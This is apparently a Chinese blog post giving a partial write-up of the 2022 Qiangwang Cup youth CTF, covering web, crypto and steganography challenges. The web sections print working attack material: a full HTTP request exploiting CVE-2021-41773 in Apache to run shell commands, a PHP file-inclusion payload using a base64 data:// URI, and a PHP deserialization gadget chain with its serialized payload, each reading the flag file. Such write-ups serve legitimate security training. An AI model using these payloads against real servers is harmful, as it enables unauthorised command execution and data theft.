首页 > 其他分享 >2022年强网杯青少年专项赛-部分WRITEUP

2022年强网杯青少年专项赛-部分WRITEUP

时间:2022-11-23 23:11:56浏览次数:60  
标签:function __ 年强 WRITEUP 22% 3A% flag 2022 public

 

Web1

(题目序号 请参考解题总榜上面的序号)

操作内容:

如该题使用自己编写的脚本代码请详细写出,不允许截图

提示存在cve-2021-41773漏洞,那就直接执行命令看/flag

POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1

Host: 47.94.204.65:43035

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 14

echo;cat /flag

图形用户界面

描述已自动生成

flag值:flag{8b638132-49ce-4e8d-ba2a-6601586dcb83}

Web 2

(题目序号 请参考解题总榜上面的序号)

操作内容:

图片提示flag在蛋糕里,发现存在cream.php页面

盘子里有食物

描述已自动生成

可以看到给的源码,有文件包含

图形用户界面, 文本, 应用程序

描述已自动生成

这里直接利用伪协议+php自带的临时文件构造payload,构造出?file=php://temp

源码中写了content会对关键词做过滤,那使用base64的思路进行绕过,用伪协议写入文件内容构造出、

data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oImNhdCAvZmxhZyIpOw==

URL: cream.php?file=php://temp&content=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oImNhdCAvZmxhZyIpOw==

图形用户界面, 文本, 电子邮件

描述已自动生成

flag值:flag{089b8efc-5590-479c-bc79-ac7e61afbe65}

Web 3

(题目序号 请参考解题总榜上面的序号)

操作内容:

下发容器,发现没有提示信息,查看常规信息路径,发现存在www.zip网站源码

图形用户界面, 应用程序, Teams

描述已自动生成

跟着该源码访问,发现存在demo.php,直接开始审计源码

  1. 发现parse_url可以导致绕过

文本

描述已自动生成

2.发现Circle类可引发代码执行

文本

描述已自动生成

梳理利用链,在原来的代码上进行修改,直接回显序列化的内容

源码

图形用户界面, 文本, 应用程序, 电子邮件

描述已自动生成

拼接url:

///demo.php?data=

O%3A6%3A%22Sliver%22%3A2%3A%7Bs%3A6%3A%22secret%22%3BO%3A5%3A%22Range%22%3A2%3A%7Bs%3A5%3A%22horis%22%3Bs%3A16%3A%22system%28%27nl+%2F%2A%27%29%3B%22%3Bs%3A4%3A%22link%22%3BO%3A5%3A%22Water%22%3A1%3A%7Bs%3A9%3A%22waterfall%22%3BO%3A6%3A%22Circle%22%3A2%3A%7Bs%3A6%3A%22daemon%22%3BN%3Bs%3A7%3A%22%00%2A%00dash%22%3Bs%3A16%3A%22system%28%27nl+%2F%2A%27%29%3B%22%3B%7D%7D%7Ds%3A5%3A%22resty%22%3BN%3B%7D

图形用户界面, 文本, 应用程序, 电子邮件

描述已自动生成

如该题使用自己编写的脚本代码请详细写出,不允许截图

<?php

class Water{

public $waterfall; //p waterfall=new Circle();

public function __construct(){

$this->waterfall = array();

}

public function __get($value){

$function = $this->waterfall;

return $function();

}

}

class Circle{

public $daemon;

protected $dash="system('nl /*');";

//public function __toString(){

// return $this->daemon;

//}

public function runc($value){

@eval($value);

}

public function __invoke(){

$this->runc($this->dash);

}

}

class Range{

public $horis="system('nl /*');";

public $link;

//public function __construct($link="link"){

// $this->link = $link;

// echo $link;

//}

public function __toString(){

return $this->link->horis;

}

}

class Sliver{

public $secret;

public $resty;

 

public function __destruct(){

if(preg_match("/circle|gopher|http|file|ftp|https|dict|\.\./i", $this->secret)) {

echo "no~no~no~";

}

}

function __wakeup(){

if ($this->secret != 'circle') {

$this->secret = 'circle';

}

}

}

$a = new Sliver();

$b = new Range();

$c = new Water();

$d = new Circle();

$a->secret = $b;

$b->link = $c;

$c->waterfall = $d;

echo urlencode(serialize($a));

?>

flag值:flag{b9bec974-1c29-4e7b-ad0f-22751e5e5aa3}

coypto

图形用户界面, 文本, 应用程序, 电子邮件

描述已自动生成

打开后发现A和B的字母看着像摩斯密码

把A替换成- 把B替换成.

图形用户界面, 应用程序

描述已自动生成

然后莫斯密码解密

然后用quip分析词频

得到flag

flag{1d817f23-4e20-9405-bf6d-e83d055316d6}

flag都是小写大写交的时候是错误的

corpyto2

图形用户界面, 应用程序

描述已自动生成

栅栏密码

图形用户界面, 文本, 应用程序

描述已自动生成

得到假的flag=FLAG[vxpsDqCElwwoClsoColwpuvlqFvvFrpopBss]

ROT47解密查看32行31行

图形用户界面, 文本, 应用程序

描述已自动生成

然后吧32行的数字和符号换成31行的数字和符号然后得到flag

flag{7914d2ce-880c-40c0-8167-2f77f3101b44}

MSIC1

先base64解密后用winhex查看

然后发现文件头不对

PNG文件头的01和23翻转下

然后运行百度来的处理脚本:

文本

描述已自动生成

运行脚本得到图片

图片包含 图形用户界面

描述已自动生成

然后使用Stegsolve可查看到lsb的内容,再使用工具cloacked-pixel

key就是音乐的财富密码,万能和弦4536251,用这个key来解

得到

flag{5cc0aa21208b517dbd0bde650247237f}

MSIC3、

Winhex查看

电脑屏幕的照片上有文字

描述已自动生成

然后使用binwalk -e 分解

分解出来secret.png

密码是刚刚winhex查看的文件尾

7his_1s_p4s5w0rd

然后lsb解密

python2 lsb.py extract secret.png f111.txt 7his_1s_p4s5w0rd

得到flag

flag{2e55f884-ef01-4654-87b1-cc3111800085}

标签:function,__,年强,WRITEUP,22%,3A%,flag,2022,public
From: https://www.cnblogs.com/rule-linux/p/16920471.html

相关文章

  • 2022-11-23 Acwing每日一题
    本系列所有题目均为Acwing课的内容,发表博客既是为了学习总结,加深自己的印象,同时也是为了以后回过头来看时,不会感叹虚度光阴罢了,因此如果出现错误,欢迎大家能够指出错误,我......
  • 2022.11.23
    倒计时2天了!$$困~~~~用我前天买的奶茶的杯子泡上咖啡,这个杯子真的好大!用它喝水好有牌面。嫖题,嫖题!8:35开始!$$T1什么东西?dp?还是个小清新题?T2什么东西?T3......
  • 【2022.11.23】爬虫基础(1)
    内容概要1.爬虫介绍2.requests模块发送get请求3.get请求携带参数4.携带请求头5.携带cookie6.发送post请求7.响应Response8.获取二进制数据9.解析json内容详......
  • #yyds干货盘点#【愚公系列】2022年11月 微信小程序-地图的使用之API相关函数案例
    前言地图基础属性:属性类型默认值必填说明最低版本longitudenumber是中心经度1.0.0latitudenumber是中心纬度1.0.0scalenumber16否缩放......
  • 【2022-11-23】luffy项目实战(十三)
    一、前期准备1.云服务器购买阿里云服务器:https://www.aliyun.com/?spm=5176.13735996.J_3207526240.1.555e3c60eweQIY腾讯云服务器:https://cloud.tencent.com/......
  • P8818 [CSP-S 2022] 策略游戏
    [CSP-S2022]策略游戏实际上就是先手的那个人取保底,后手的那个人取此刻的最佳值。我一开始以为两个人都取保底,谁想到这么没意思……那么就是线段树小应用,分别维护区间......
  • P8817 [CSP-S 2022] 假期计划
    [CSP-S2022]假期计划我第一眼看的时候怎么搞都会多一个\(O(\logn)\),还在想是不是有什么高深做法……然后想到边权为\(1\)的时候好像根本不需要用Dijkstra,直接BFS......
  • 强网杯_部分WriteUp
    签到打开得到flagFalg=flag{we1come_t0_qwb_s6}GameMaster21点游戏和打游戏没有太多关系直接分析重要的函数goldFunc就可以看到是异或+AES然后对我们的文件进行解密解......
  • P8819 [CSP-S 2022] 星战
    [CSP-S2022]星战这么长时间过去都快不会写题解了。嗯……不过还是稍微记一下会比较好。题意看完之后就是让我们去判断整张图是否是一个内向基环树森林。然后这个事情......
  • 【2022-11-23】爬虫从入门到入狱(一)
    一、爬虫介绍#爬虫介绍: 网络爬虫(webcrawler)又称为网络蜘蛛(webspider)或网络机器人(webrobot),另外一些不常使用的名字还有蚂蚁、自动索引、模拟程序或蠕虫,同时它也是“物联......